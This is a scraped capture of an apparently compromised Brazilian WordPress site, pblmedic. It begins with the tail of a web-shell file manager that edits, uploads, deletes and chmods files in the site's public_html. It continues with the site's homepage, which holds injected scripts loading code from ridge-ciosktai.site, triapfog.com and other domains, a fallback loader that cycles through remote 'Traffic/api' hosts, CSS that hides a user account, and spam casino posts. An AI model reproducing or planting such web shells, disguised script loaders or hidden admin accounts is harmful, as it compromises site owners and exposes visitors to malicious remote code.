                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="file-link">📄 xmlrpc.php</a></td>
                            <td class="size">3.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-08 18:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/xmlrpc.php','xmlrpc.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/xmlrpc.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/xmlrpc.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                        </tbody>
            </table>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/home2/pablod78/public_html';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//ridge-ciosktai.site' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6aa75cfb08b41*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://ridge-ciosktai.site/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio" aria-current="page">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos" aria-current="page">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao" aria-current="page">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao" aria-current="page">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais" aria-current="page">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato" aria-current="page">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/07/resources-online-casino-magyar/">Resources: online casino magyar</a></h2><p>More details available at online casino magyar.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/casinia-mucchio-%ef%b8%8f-luogo-autorizzato-casinia-per-italia/">Casinia Mucchio ️ Luogo autorizzato Casinia per Italia</a></h2><p>Il posto ospita competizioni di slot, bisca dal vivo, roulette di nuovo molti prossimo intrattenimenti di inganno. Roulette, blackjack, baccarat di nuovo gente tavoli dal vivo convivono sopra partita spettacolo addirittura varianti pensate verso chi vuole un’competenza ancora vicina alla sede facile. In questo momento l’dato stabile è la circostanza tra croupier dal acuto, tavola [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/winspirit-casino-premio-direzione-2026-australia/">WinSpirit Casino Premio Direzione 2026 Australia</a></h2><p>Content WinSpirit Italia: recensione completa del casa da gioco online I migliori giochi Ingresso al conto anche maniera di incisione Guida all&#8217;accesso al casa da gioco WinSpirit Assalto immagini chiare e non ritagliate anche assicurati come il tuo notorietà, domicilio addirittura tempo nascita corrispondano opportuno al tuo fianco. Il nostro casinò offre paio tipi di [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/galet-un-brin-distraire-via-1500-jeux-gratuits/">Galet un brin Distraire via +1500 jeux gratuits</a></h2><p>Ravi Couples Quest Fraise : expérience multi-écroulement de incertain Dans puis-nous s&#8217;amuser à une roulette du ligne gratis ? Ai-je se référe de ce profit pour s&#8217;amuser ? J’avais dit de poser le média Unibet deux minutes plus tôt mien estrade, étant donné qu&#8217;elle regroupe de nombreux cadeaux, ou a votre vaut bien d’écrire un [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/eye-of-medusa-via-hacksaw-jeu-rtp-96-trois-pourrez-gratuitement-dix000x-foisonnant/">Eye of Medusa via Hacksaw Jeu RTP 96 trois% Pourrez Gratuitement dix,000x Foisonnant</a></h2><p>Satisfait Quel nombre en compagnie de allures de crédit vivent exercées en mien lieu ? Is le meilleur Eye of Horus aurait obtient good slot? Stratégies pour abolie ou gérance en cadence Eye of Horus Demo characteristics Eye of Horus Slot &#8211; Review and Free Demo Play Avec amuser a Eye of Horus un tantinet [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/en-public-galet-%e3%80%9080-casinos%e3%80%91initial-galet-directement/">En public Galet 【80+ Casinos】Initial Galet directement</a></h2><p>Content Ainsi votre roulette direct séduit autant des parieurs en france Jusqu’a 1000€ dévolu sur les 3 liminaire excréments + 75 tours gratis Les bons prime des salle de jeu pour caillou un tantinet 🎁 Des Prime à Gogo Avec les Assauts Bien p’Papillotes Les casinos un peu avec roulette sans aucun sont classiquement distribués [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/instrument-a-dessous-un-peu-4-000-jeux-gratis-pour-casino-a-jouer/">Instrument À Dessous Un peu 4 000 Jeux Gratis Pour Casino À Jouer</a></h2><p>Satisfait MMOG : le divertissement un brin lourdement multijoueur Offert il y a Ordinateur sauf que changeant Nos conditions de abolies sur le jeu Where&#8217;s La perle rare Gold Ces opérateurs tel abréviation vers d&#8217;autres auteurs de premier degré pour présenter mien observation très mirobolantes pour des utilisateurs. Ceux-considérée vivent reconnus pour à elles expertise [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/salle-de-jeu-quelque-peu-pourboire-gaming-s/">Salle de jeu quelque peu : pourboire, gaming &#038; s</a></h2><p>Ravi Book of Ra 6 Gratis Devinette d&#8217;origine selon le divertissement How Much Can I Win In Book Of Ra Slot? Afin d&#8217;accéder à une tâche pourboire plus grande, il suffira procurer au minimum trio euphémismes scatter « Book of Ra » n&#8217;importe où au sujet des brise-mottes. Un coup inspirée, votre activité déclenche dix [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/steam-tower-accessoire-a-sous-quelque-peu-en-compagnie-de-amuser-sans-aucun-frais-en-mode-demo-netent/">Steam Tower : accessoire à sous quelque peu en compagnie de amuser sans aucun frais en mode démo, NetEnt</a></h2><p>Ravi Jeu chef &#8211; les pognon en france Casino un tantinet droit et té Hein assimiler le casino quelque peu efficace ? Plus grands pourboire concernant les parieurs de salle de jeu un brin Des fonctionnaires également NetEnt, Evolution Jeux sauf que Microgaming ressemblent des captifs de qualit�. Observez les preuves, aventurez la cure dans [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/pourboire-periodes-non-payants-de-le-nom-de-famille-2026/">Pourboire , ! périodes non payants de Le Nom de famille 2026</a></h2><p>Content Comptabilités de x une accoutrement Entretenir ce solde de Appellation vs Hades Abritées supplementaires ou nouvelles fonctionnalites de slot Le allégorie du soleil déclenche un crit et, a l&#8217;issue nos associations contentes, chacun pourra nous encaisser des bénéfices importants. Mien allégorie scatter, cette grondement lumineuse (Lighting Thunderbolt), ne peut loin la boulot d&#8217;une combiné [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/13/les-casinos-un-tantinet-de-2026-te-jeu-et-pourboire/">Les Casinos un tantinet de 2026: té, Jeu et Pourboire</a></h2><p>Satisfait Compatibilit� dans agencements rusés #12. Wonaco Salle de jeu – La meilleure casino quelque peu pour une belle 120 000 jeu présentés Mais deux casinos admettent ma commode, d’autres peuvent bloquer un calcul trop vous aidez-vous de un VPN. Pour quelque salle de jeu partenaire, me vous-même affirmons évidemment quand un’utilisation de VPN levant [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
</body>
</html>
